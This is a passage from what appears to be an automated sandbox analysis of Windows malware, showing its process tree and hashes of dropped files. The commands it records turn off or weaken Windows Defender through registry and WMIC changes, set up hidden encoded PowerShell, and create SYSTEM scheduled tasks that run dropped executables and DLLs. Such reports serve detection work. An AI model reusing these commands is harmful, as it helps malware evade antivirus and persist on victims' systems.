C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵PID:1952
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵PID:1584
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵PID:1212
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵PID:2180
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵PID:1308
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵PID:1592
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵PID:2832
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵PID:2908
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵PID:3012
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵PID:2556
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵PID:3000
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2104
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2292
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵PID:2204
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵PID:2632
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2608
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2848
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "geIHXerhR" /SC once /ST 00:21:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2752
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "geIHXerhR"3⤵PID:2324
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "geIHXerhR"3⤵PID:2428
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1476
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2224
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1436
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:936
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:45:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe\" 0c /bIFgdidNa 385121 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2456
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZTNkTKukmvvbOMPkn"3⤵PID:2232
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 6003⤵
- Loads dropped DLL
- Program crash
PID:1604
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exeC:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\eNYRCkf.exe 0c /bIFgdidNa 385121 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2028 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1068
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2712
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2200
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1148
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2000
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:516
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:876
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2936
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1488
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:436
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2916
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3052
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2944
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1608
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:768
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2252
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"3⤵PID:1748
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:596
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:2240
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:2876
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2856
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2908
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\zkIMIO.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1092
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:420
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ucrVpivlTlXwlAC"3⤵PID:3052
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ucrVpivlTlXwlAC"3⤵PID:2096
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1784
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\GIsfsbD.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1608
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:30:14 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll\",#1 /PONsdidJpV 385121" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BjyVbWVaXyfCTlHuI"3⤵PID:2060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"3⤵PID:700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 15123⤵
- Program crash
PID:2736
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 3851212⤵PID:1212
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\ClJHMfRP\FlVGcfu.dll",#1 /PONsdidJpV 3851213⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1140 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"4⤵PID:2452
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3F9049A4-E151-4328-955F-2EFE76B778DB} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]1⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
(The -EncodedCommand value is base64 of UTF-16LE text and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force — consistent with the gpupdate.exe /force child process shown beneath it. The same encoded command is launched three times from the scheduled-task engine, which forces a Group Policy refresh after the Defender policy keys listed in the signatures were written.)
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1212
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2292 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2496
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2532
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2256
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2460
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2348
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
2KB
MD5f288dc1e08bdf4ec07e528d58555edf1
SHA17ea87411edcb6fd7a424755fd42db2186db60bb1
SHA256da84e35fe3cfa690d188e8ad090a3cc43b9a6713808e59fee6c25d7b716475b0
SHA5125f9f1a512879b977bad1d9803d14d2d790e2a4631637de023e5bb2c62e371c5b95ba934dad27a93c56035b4f8a5a2a2ad0f972925cd0949cd8f85e87bf843b04
-
Filesize
2KB
MD5ccdaeb115ffc2bbb649a56839557ea3a
SHA1bd5c86877f06d8b1664d5536f0badd57336e0feb
SHA256bbd5df6b642176d94c850a0ae73a2b7a84203c1d4f1e3e8a515b949965c905c4
SHA5124bad6bececf64de9ff596afa56d1425adf1df055fdf1c3289e43f4a49a5a959d254291237c88f6a323dcd6365f65c1dacf65f03da8c49a6ddde3bc76b08e183f
-
Filesize
2KB
MD5a0ca83890132697bd1c6cd05b9c00a37
SHA1520ff6ee5d7569a1685d2a9a2afb8b158776a6d0
SHA256ed27262ef62c4c740bee54b35dfe2878e1ff82f863e9611723d304eb9aead68d
SHA512e98f5db6e2461aa7e257d01fd5018c55b5db2d3a2991fe4943ff867b2bd1ecd40bd003e5c37c923633a8f5e4060daed5125a8106eed9f3a28949c468fae86a46
-
Filesize
2KB
MD542e158f1794e055e944693c96438761e
SHA10ffdc336985d804ac9195051581237e1219de0bd
SHA2563b84f7818d8c5f7ea7ee36fc3c05896eed56922c13f88e959553176db6a64597
SHA512cc39dbdb60cd3171ac6aa216fe31efdd31553c32fa87f61e2371f7e57a886cb43a85b8e6ffc1770a8d8430280641c83f3062fb61284e0315423e72486bb5d416
-
Filesize
2.0MB
MD5c14f91d92ce590f19e4c8f861c4ac94a
SHA1397853b82bf5ec920fdeec336708999d8eef4bd2
SHA256f796f4e5408a2ab68d57c08a5353d0692a65f69f98dd66e7424c5d0f3ef0234c
SHA512754f4935176c53c07b927ecc5cf3e2a9ef86218aedd2e017258b2464324d3b50b26ca670cc073f51a388ef078298b92a56e250acfee45608770e5d074fd5f1bb
-
Filesize
2KB
MD5617d79daf144345bbad41a988cf4e7dd
SHA13261de16057471554d3358190f774e41cc1cba67
SHA256ca6100d84417365828151234c7411b88b11eeb06e89ef5a89e84246845c874bc
SHA51234bfa4d3a509fda4db90bbfbf53bf3ab770be8649c1cf492c830f6def96455c2e849b105330bc3928d5f70204cd57c4a2f9f1a14688e44d8c0ecf458142809d0
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5875531fe10c3322910f6851b7f374b55
SHA13b5db893f6b4cc708560ba54cb16d285e862e415
SHA256ab676e3c0f603607e1b784bd5f3216bda0e7672ba85ae36398857250555f6dc2
SHA5122cad9f31b7e0333a9953b940271081ab3c3fcbd9e4275f9a765d3300950bd1ef809ec732bb02a17d4a81a60755411fd338cfd328db0ac67ef3755441f02328a6
-
Filesize
27KB
MD5589160343c77df22b0e9d1a4781cc29e
SHA1e2fca682f9f68824d6e1a9e5e7e953958547c9dd
SHA256f47cfc5c5fdf82ee3966800caf84d1bdf651d00cd9fcd867712f44b7437bcf33
SHA512c3bfd58ec08509dda63817c5e1e2a040e5edb73b87438f5529177f1f8dec3212da1b70bfd4972c1631a5f17b907b65ce4a59ce9c4f989ac31bbaa5dcddeb49db
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5547820f73a6c52215af61d6a7c1d74d8
SHA1bf89072ce6a9692dab17c6da46666ad25e4cb585
SHA2564b6cd3f4fada788eb2e823003fb7165f9a8ba7bd22854fed4e4dd3dd11a7635a
SHA51298c46085c3222f967a232bf6cc2e4acd049f1a71daf847fa608990c7dc063eb2831129ba3c9657edb1c2054d384069c0e201c6dcb3a4107845718a38fcae94ed
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cc3031eca18185de7031b4e4704470a2
SHA170f5ee74dfb470ec4aafd87990d9035b3c388b09
SHA25626961dc83850f4168490d18d2bfae483d92bfac9a12ff3c46d94215537b79776
SHA5123090f0adaa099c3b50e806bccf0030ad85d3be0bae97999df651ffb6f5365ac970da7e161e3a0ad0cee293dacb14e0034bb13128d24a4f0a6dec541286dda694
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57654ff1caff5ec9d4c19d467cd4cd633
SHA1ee59e801b8c90220e99401ecbc4ab4456803b19a
SHA256d018b6276c4b5138b11ef3b7c3075778a12f3dc9990c13fc6ab439487e69f93f
SHA51219da2348c3b161d7064e25cd9442c08f940200d063a9d07f022919b0b442472e56e250bb673c83369a868b19fa5f856874e1d41287923c73f36c3c94dcbeb55c
-
Filesize
6KB
MD5641cd4cda9e6a63d6ff49466f169bb4f
SHA1d9dea45401d931e44569f7586249bc6b687575d3
SHA256bdf0733822df0cefd3b0f726fdb993e450601829168cf9bbc41f8ad51896bf12
SHA5120387891b53dccc6ba2c53e7c92c9bd04a3b9a438c57cc2571de6abdc2b1110434a08731f697421d40b46743c6c0c266b208233fb170953fb2d100b4bf7f8440e
-
Filesize
6.5MB
MD521e3965bd08eabf0ee24dd9d17dc0d5c
SHA18680d90f50ed3caf0b617a1cf512c664bdbd7be8
SHA256570e0b2d996c3151a08c5042555500988b7eca34c2126d335e06da13ce772f4a
SHA5129b5662e11db22c04c3f4463e493c28b5ef2a7a997e644a6cad8f38d8df2947f8f14b049d0d2136b4e98a53db9db94c5a2ff613b8cdbaa2c7107a46f855c81a3e
-
Filesize
9KB
MD5e3b6fce460d4376c66ddf888dceb2bd0
SHA1a9a54f824d581b6c42c828937222698eadae464d
SHA256a399a8eeac6a0414067798e74d5446bc0a6fed60d379d6f72351d9ecb51431f7
SHA5129bb0e8ff4f3b4657c9f77d185ebe0bcb22e116c41fe99cba79b93e1a1a7528a322c3e77235bde7eef7f34b22c1b55d5bd11fe36cd47d3d8bab566136ff551f1e
-
Filesize
5KB
MD5bf1f631d5d6e9168c9e69deb988eeabe
SHA154a1cc608061f3c9b117f3baaf0e09cedb12b45a
SHA256dbd6846ee4d005d54fc33705ae63914a1b7d08f5e1a9a6ed2bbbda0e36af5188
SHA5127610bb27af030ced451aa5107808448fa5d38979e4a198abd12e959daa9c351daa4c0e919d9c356471415ce5392c5a61e000ffdb2bd9ad7c8b7b507b2aea8cfc
-
Filesize
6.3MB
MD527ac45acebe576d24f84ca8dadc355c3
SHA16640bf3cfa9d0610f3150d45a52f88145c4799e2
SHA25632e6e4acc8ea46841ad65af928c7aff9fcc1224cb5f6ba557c30f8133a440b7a
SHA51229fc5116e32bc12a8f386ee824bd6d44824acc1c22cb4c8856fbc8e9076e12d24d77d3fd85294d5adc2ff199f8b11dcf3ecb6e3ea3d8cb65d8accf0f46e60b2e
-
Filesize
6.7MB
MD5a5dca05edc6eda6e2acfe7ca41641cc5
SHA1b772813e63a424ae31a2bd75c0067be03aae0165
